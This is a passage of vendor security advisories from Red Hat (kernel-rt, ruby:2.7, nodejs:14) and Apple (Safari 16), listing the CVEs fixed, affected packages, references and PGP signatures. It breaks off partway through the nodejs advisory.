Red Hat Security Advisory 2022-6437-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2022:6437-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6437  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-21123 CVE-2022-21125 CVE-2022-21166  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time (v. 8) - x86_64  
Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* Incomplete cleanup of multi-core shared buffers (aka SBDR)  
(CVE-2022-21123)

* Incomplete cleanup of microarchitectural fill buffers (aka SBDS)  
(CVE-2022-21125)

* Incomplete cleanup in specific special register write operations (aka  
DRPW) (CVE-2022-21166)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* The latest RHEL 8.6.z3 kernel changes need to be merged into the RT  
source tree to keep source parity between the two kernels. (BZ#2111112)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2090237 - CVE-2022-21123 hw: cpu: Incomplete cleanup of multi-core shared buffers (aka SBDR)  
2090240 - CVE-2022-21125 hw: cpu: Incomplete cleanup of microarchitectural fill buffers (aka SBDS)  
2090241 - CVE-2022-21166 hw: cpu: Incomplete cleanup in specific special register write operations (aka DRPW)

6. Package List:

Red Hat Enterprise Linux Real Time for NFV (v. 8):

Source:  
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.src.rpm

x86_64:  
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-kvm-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm

Red Hat Enterprise Linux Real Time (v. 8):

Source:  
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.src.rpm

x86_64:  
kernel-rt-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-core-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-devel-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-modules-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-372.26.1.rt7.183.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21123  
https://access.redhat.com/security/cve/CVE-2022-21125  
https://access.redhat.com/security/cve/CVE-2022-21166  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCCBtzjgjWX9erEAQiMVxAAj4C0/6TQ/Wts6/PsnA7c4EJbxOzcjnSf  
bdJSktu0TYTmpmiZI1tZ22LbABATshxGKqzz15bFGQlIE+wHSDxN8NF86XPmdNCF  
Yqi8g2YZDLeKd02ggzE8ZOcjuSdkAT09qaTP9AusbQububoCFv/dR4v0UZ3+Mpk2  
Bhe1VumtyZVHt4ps06dRVthVCt4HJdPEEOFmoCE4kg+ij6x626dvRuLWFbUclhHe  
qg+5JOBLJx9UCMHMS5X7qrdySfLw6xrqX0QM18ElmCTtnfJ03FQjzw6j6F0gV17a  
xGqDhJJbYby4Uhqe0eNPG5P01UW+8aWyXIxtpuG/uCJ0oC65j4yXpG136fuztx1a  
R+7c2xYeuZ1qrNvYsJDecYtgDwlSuhWJ/S+snlYAgB4HJ6ouHPx2Y0SYu2Xznm/2  
fNj5oV13UioCVvTptBU6dI6ByX8qalq0fIbt+lb5M23vu+zlpMs6b80u3pekC7uR  
3PM9Udb59P9wIcwDlS1v9jSyO/4B3maCh6vtjpdGDBUIbbOSE5E9S7zTR4vHFzhI  
ji5EcEHGpBz615xVGi/fSzudyR/2yjzqjazhkX5dYEZ5kOBtOOeAxTIgAQ3yhjt2  
+ZFPoA9cSGTxR3AhZU+lnggpod97b8rD3IqCuz2PetsRoikUTQSIRiKBlp058FAt  
/NJdeWcHmjI=t/FA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6437-01

Apple Security Advisory 2022-09-12-5 - Safari 16 addresses buffer overflow, code execution, out of bounds read, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2022-09-12-5 Safari 16

Safari 16 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/HT213442.

Safari Extensions  
Available for: macOS Big Sur and macOS Monterey  
Impact: A website may be able to track users through Safari web  
extensions  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 242278  
CVE-2022-32868: Michael

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A buffer overflow issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 241969  
CVE-2022-32886: P1umer, afang5472, xmzyshypnc

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: An out-of-bounds read was addressed with improved bounds  
checking.  
WebKit Bugzilla: 242762  
CVE-2022-32912: Jeonghoon Shin (@singi21a) at Theori working with  
Trend Micro Zero Day Initiative

WebKit  
Available for: macOS Big Sur and macOS Monterey  
Impact: Visiting a website that frames malicious content may lead to  
UI spoofing  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 243236  
CVE-2022-32891: @real_as3617, an anonymous researcher

Safari 16 may be obtained from the Mac App Store.  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmMfdgMACgkQ4RjMIDke  
Nxk7dRAAgdvFNEmEdfhDdLWbn7ZIdNrxPZDsg1MiCVFyPvPesNRo3Uj+XI2m93E4  
U7koTDn7+DE62TjkdNEqOQ0bXpy84uWAcZoZDmGJOt0IQOPwcMf8CMzhj/GytrTt  
PCC2IjWDuoJsoQ9lIm71WN3nsfrpO/P4cO04H3Tw4CxFI9Oj0doALGvamf0XVYCN  
TyCdw15kQ+WTriI5rnzsE4qqh4vaEKeuyEiZQzR26p3ctpT+inffGz6g9uYgy5AW  
v1Kwln7DDSIvYyAcrIyPKqwjsdfD6dmnufKTSUkOHLOpvqx5P/PLQ9f4qv3VXy6c  
Bs4eLUUvONzxoo07TB3V3/OsC1eQwDnPugrja5SFTgZUpl9QM7PMijoOar7Y11JL  
fMgJArHEDWB4JatejBrgsBps+SU2ozSAaT71hfm77Jb1TSSRDuxX2po2AjiwKOcF  
S+T2yJSIgI5nsP9i1RRG3+hN6MOUKKmFxlWxXPLdCO4pG04qdmMOE5HR2bRgQ3/o  
gdRb/OYTQkchSlhbpvdF8zO0QZLXh+GeiLxWoygfbQQmv33KeKRlrbKVctyB4HQZ  
ZxTi0Tn5pfdnuB2QvGn6b0KZZJlDHkiiNj3grvD5uFSH6H0MV7apLiJ636qEL/Tp  
o8PWQgop+KfYatZDVAQMYekpRYwz7oDdFm/i6SYvnP09wx55Ooc=+qsX  
-----END PGP SIGNATURE-----

Apple Security Advisory 2022-09-12-5

Red Hat Security Advisory 2022-6447-01 - Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. Issues addressed include denial of service and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: ruby:2.7 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6447-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6447  
Issue date:        2022-09-13  
CVE Names:         CVE-2021-41817 CVE-2021-41819 CVE-2022-28739   
=====================================================================

1. Summary:

An update for the ruby:2.7 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Ruby is an extensible, interpreted, object-oriented, scripting language. It  
has features to process text files and to perform system management tasks.

The following packages have been upgraded to a later upstream version: ruby  
(2.7.6). (BZ#2109424)

Security Fix(es):

* ruby: Regular expression denial of service vulnerability of Date parsing  
methods (CVE-2021-41817)

* ruby: Cookie prefix spoofing in CGI::Cookie.parse (CVE-2021-41819)

* Ruby: Buffer overrun in String-to-Float conversion (CVE-2022-28739)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2025104 - CVE-2021-41817 ruby: Regular expression denial of service vulnerability of Date parsing methods  
2026757 - CVE-2021-41819 ruby: Cookie prefix spoofing in CGI::Cookie.parse  
2075687 - CVE-2022-28739 Ruby: Buffer overrun in String-to-Float conversion  
2109424 - ruby:2.7/ruby: Rebase to the latest Ruby 2.7 release [rhel-8] [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
ruby-2.7.6-138.module+el8.6.0+16148+54b2ba8f.src.rpm  
rubygem-abrt-0.4.0-1.module+el8.3.0+7192+4e3a532a.src.rpm  
rubygem-bson-4.8.1-1.module+el8.3.0+7192+4e3a532a.src.rpm  
rubygem-mongo-2.11.3-1.module+el8.3.0+7192+4e3a532a.src.rpm  
rubygem-mysql2-0.5.3-1.module+el8.3.0+7192+4e3a532a.src.rpm  
rubygem-pg-1.2.3-1.module+el8.3.0+7192+4e3a532a.src.rpm

aarch64:  
ruby-2.7.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
ruby-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
ruby-debugsource-2.7.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
ruby-devel-2.7.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
ruby-libs-2.7.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
ruby-libs-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-bigdecimal-2.0.0-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-bigdecimal-debuginfo-2.0.0-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-bson-4.8.1-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-bson-debuginfo-4.8.1-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-bson-debugsource-4.8.1-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-io-console-0.5.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-io-console-debuginfo-0.5.6-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-json-2.3.0-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-json-debuginfo-2.3.0-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-mysql2-0.5.3-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-openssl-2.1.3-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-openssl-debuginfo-2.1.3-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-pg-1.2.3-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.3.0+7192+4e3a532a.aarch64.rpm  
rubygem-psych-3.1.0-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm  
rubygem-psych-debuginfo-3.1.0-138.module+el8.6.0+16148+54b2ba8f.aarch64.rpm

noarch:  
ruby-default-gems-2.7.6-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
ruby-doc-2.7.6-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-abrt-0.4.0-1.module+el8.3.0+7192+4e3a532a.noarch.rpm  
rubygem-abrt-doc-0.4.0-1.module+el8.3.0+7192+4e3a532a.noarch.rpm  
rubygem-bson-doc-4.8.1-1.module+el8.3.0+7192+4e3a532a.noarch.rpm  
rubygem-bundler-2.2.24-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-irb-1.2.6-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-minitest-5.13.0-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-mongo-2.11.3-1.module+el8.3.0+7192+4e3a532a.noarch.rpm  
rubygem-mongo-doc-2.11.3-1.module+el8.3.0+7192+4e3a532a.noarch.rpm  
rubygem-mysql2-doc-0.5.3-1.module+el8.3.0+7192+4e3a532a.noarch.rpm  
rubygem-net-telnet-0.2.0-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-pg-doc-1.2.3-1.module+el8.3.0+7192+4e3a532a.noarch.rpm  
rubygem-power_assert-1.1.7-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-rake-13.0.1-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-rdoc-6.2.1.1-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-test-unit-3.3.4-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygem-xmlrpc-0.3.0-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygems-3.1.6-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm  
rubygems-devel-3.1.6-138.module+el8.6.0+16148+54b2ba8f.noarch.rpm

ppc64le:  
ruby-2.7.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
ruby-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
ruby-debugsource-2.7.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
ruby-devel-2.7.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
ruby-libs-2.7.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
ruby-libs-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-bigdecimal-2.0.0-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-bigdecimal-debuginfo-2.0.0-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-bson-4.8.1-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-bson-debuginfo-4.8.1-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-bson-debugsource-4.8.1-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-io-console-0.5.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-io-console-debuginfo-0.5.6-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-json-2.3.0-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-json-debuginfo-2.3.0-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-mysql2-0.5.3-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-openssl-2.1.3-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-openssl-debuginfo-2.1.3-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-pg-1.2.3-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.3.0+7192+4e3a532a.ppc64le.rpm  
rubygem-psych-3.1.0-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm  
rubygem-psych-debuginfo-3.1.0-138.module+el8.6.0+16148+54b2ba8f.ppc64le.rpm

s390x:  
ruby-2.7.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
ruby-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
ruby-debugsource-2.7.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
ruby-devel-2.7.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
ruby-libs-2.7.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
ruby-libs-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-bigdecimal-2.0.0-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-bigdecimal-debuginfo-2.0.0-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-bson-4.8.1-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-bson-debuginfo-4.8.1-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-bson-debugsource-4.8.1-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-io-console-0.5.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-io-console-debuginfo-0.5.6-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-json-2.3.0-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-json-debuginfo-2.3.0-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-mysql2-0.5.3-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-openssl-2.1.3-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-openssl-debuginfo-2.1.3-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-pg-1.2.3-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.3.0+7192+4e3a532a.s390x.rpm  
rubygem-psych-3.1.0-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm  
rubygem-psych-debuginfo-3.1.0-138.module+el8.6.0+16148+54b2ba8f.s390x.rpm

x86_64:  
ruby-2.7.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
ruby-2.7.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
ruby-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
ruby-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
ruby-debugsource-2.7.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
ruby-debugsource-2.7.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
ruby-devel-2.7.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
ruby-devel-2.7.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
ruby-libs-2.7.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
ruby-libs-2.7.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
ruby-libs-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
ruby-libs-debuginfo-2.7.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-bigdecimal-2.0.0-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-bigdecimal-2.0.0-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-bigdecimal-debuginfo-2.0.0-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-bigdecimal-debuginfo-2.0.0-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-bson-4.8.1-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-bson-debuginfo-4.8.1-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-bson-debugsource-4.8.1-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-io-console-0.5.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-io-console-0.5.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-io-console-debuginfo-0.5.6-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-io-console-debuginfo-0.5.6-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-json-2.3.0-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-json-2.3.0-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-json-debuginfo-2.3.0-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-json-debuginfo-2.3.0-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-mysql2-0.5.3-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-openssl-2.1.3-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-openssl-2.1.3-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-openssl-debuginfo-2.1.3-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-openssl-debuginfo-2.1.3-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-pg-1.2.3-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.3.0+7192+4e3a532a.x86_64.rpm  
rubygem-psych-3.1.0-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-psych-3.1.0-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm  
rubygem-psych-debuginfo-3.1.0-138.module+el8.6.0+16148+54b2ba8f.i686.rpm  
rubygem-psych-debuginfo-3.1.0-138.module+el8.6.0+16148+54b2ba8f.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-41817  
https://access.redhat.com/security/cve/CVE-2021-41819  
https://access.redhat.com/security/cve/CVE-2022-28739  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB8tzjgjWX9erEAQgejg/+OH6Jsb1IZAFisrfV/6nIZOkFqhSKpzNf  
4VhuC22aesYUEWvSip2jHbFeGVkuI+iqieKPGLr6qHxZ4m8gt5EC8Ti8L6RbJ6rx  
W0/JZBalDZDLbsZJrbAH3EoP5WOQ1DYY+FTXaQNX4Yf2VIhTTFFtBXrYumtikkcW  
K8u1qT6v3rhdysSwJc+SZi0X2AVQrTRrRXjN4ozsypJvyAkOQRYB+v79YSNVK80q  
KF/4U76ohYBx5pbzHW+Vqf8ZMBaGuseXFbcgcqlWUC4n8pKNo06pcof5+nkMYM2Z  
tPieoq7AYs9f0zeVi39kkqhyXDPCZhCxcCaBepSAFAEUil6Pib7yWA+AA/FsITC6  
Zvyn9ALA25XrUeeUAH8VngWWpJH6vcYxJe2AzkPXYoGEdgNhVgpnmdLWVkd80VSG  
ASEnPstIqYUGNR4Y1rTTy6DuvlFBlLfbwntfq1FtlXiScpvpQ8sJ+cquE4UaxWc2  
ifggdPHVHILtNFom3hDNx1l89v2bOLhS6/1DgqRKUq/J1zvHx61rCqxZ1pwh3U23  
rX2UPZ7oFlZCN2g884wLUJFPbJEs8di/0MTm6bdka27O1SP0h6d9vhZ4O69L8/BP  
GdtDZBe0TchUf+Zr0mAf7k0Mb66XH9/8oru+iEMq0tky97EVOpmbzbrYiOYdrJ4Y  
kP56IuEnZFk=  
=Mwlx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6447-01

Red Hat Security Advisory 2022-6448-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a HTTP request smuggling vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs:14 security and bug fix update  
Advisory ID:       RHSA-2022:6448-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6448  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-32212 CVE-2022-32213 CVE-2022-32214   
                   CVE-2022-32215 CVE-2022-33987   
=====================================================================

1. Summary:

An update for the nodejs:14 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* nodejs: DNS rebinding in --inspect via invalid IP addresses  
(CVE-2022-32212)

* nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
(CVE-2022-32213)

* nodejs: HTTP request smuggling due to improper delimiting of header  
fields (CVE-2022-32214)

* nodejs: HTTP request smuggling due to incorrect parsing of multi-line  
Transfer-Encoding (CVE-2022-32215)

* got: missing verification of requested URLs allows redirects to UNIX  
sockets (CVE-2022-33987)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
